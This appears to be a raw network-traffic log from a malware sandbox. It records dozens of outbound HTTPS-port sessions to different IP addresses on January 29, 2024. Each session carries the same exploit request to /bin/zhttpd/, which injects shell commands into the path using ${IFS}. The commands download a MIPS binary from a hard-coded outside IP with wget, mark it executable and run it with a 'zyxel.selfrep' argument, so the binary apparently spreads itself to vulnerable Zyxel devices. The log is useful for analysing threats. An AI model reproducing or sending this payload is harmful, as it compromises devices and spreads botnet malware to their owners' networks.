                                              Jan 29, 2024 07:04:06.325285912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8350192.168.2.1453818116.137.70.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325309038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8351192.168.2.1458516143.252.114.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325378895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8352192.168.2.1457704195.237.44.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325417042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8353192.168.2.14549044.93.223.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325453997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8354192.168.2.1450892147.123.40.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325488091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8355192.168.2.1433798218.1.135.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325512886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8356192.168.2.1434408172.13.108.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325576067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8357192.168.2.1436772195.180.168.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325584888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8358192.168.2.1435482185.227.177.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325619936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8359192.168.2.1453222106.82.117.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325644970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8360192.168.2.1436806111.189.52.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325695038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8361192.168.2.1452428142.97.209.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325757980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8362192.168.2.1443528137.13.82.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325795889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8363192.168.2.1443750149.62.144.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325826883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8364192.168.2.1452738101.14.247.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325872898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8365192.168.2.1454106212.222.180.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325911999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8366192.168.2.1452810132.120.153.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325944901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8367192.168.2.1449738180.161.196.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.325995922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8368192.168.2.1438110104.94.230.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326040030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8369192.168.2.145114899.50.35.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326070070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8370192.168.2.1445854140.115.151.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326098919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8371192.168.2.1436558212.79.211.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326170921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8372192.168.2.1459912170.59.223.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326196909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8373192.168.2.1442336186.101.52.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326242924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8374192.168.2.1452548198.249.117.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326273918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8375192.168.2.1455606216.140.118.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326328993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8376192.168.2.144949496.244.31.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326361895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8377192.168.2.1457120154.181.157.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326416016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8378192.168.2.1458100101.136.162.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326458931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8379192.168.2.1459268204.231.0.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326493025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8380192.168.2.1447726111.144.75.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326502085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8381192.168.2.143982052.124.180.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326543093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8382192.168.2.144936219.206.195.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326577902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8383192.168.2.144957261.163.87.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326626062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8384192.168.2.1455192108.167.31.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326630116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8385192.168.2.145946461.187.211.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326689005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8386192.168.2.1450154136.92.14.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326738119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8387192.168.2.1449232103.149.193.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326760054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8388192.168.2.1439792123.209.43.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326802015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8389192.168.2.1435082114.123.70.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326839924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8390192.168.2.1445622212.30.179.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326864958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8391192.168.2.145676240.217.137.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326925039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8392192.168.2.144435849.213.217.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326951027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8393192.168.2.143593662.192.254.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.326997042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8394192.168.2.145471820.7.166.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327024937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8395192.168.2.145968858.171.212.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327064991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8396192.168.2.1442524121.21.114.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327102900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8397192.168.2.143360081.125.105.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327156067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8398192.168.2.143371224.162.20.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327188015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8399192.168.2.1459490178.110.124.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327230930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8400192.168.2.1453662128.40.40.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327274084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8401192.168.2.1445552112.10.158.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327301979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8402192.168.2.1436724133.255.133.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327330112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8403192.168.2.144314285.202.78.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327393055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8404192.168.2.1446830222.137.108.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327441931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8405192.168.2.144081898.27.148.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327467918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8406192.168.2.1454574120.86.219.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327517986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8407192.168.2.144244697.136.49.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327550888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8408192.168.2.1452334122.251.238.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327591896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8409192.168.2.1449086142.42.216.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327611923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8410192.168.2.144707035.169.230.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327651978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8411192.168.2.145565646.136.116.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327702999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8412192.168.2.1460114155.141.202.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.327739000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8413192.168.2.1439652156.143.134.52443
                                              TimestampBytes transferredDirectionData
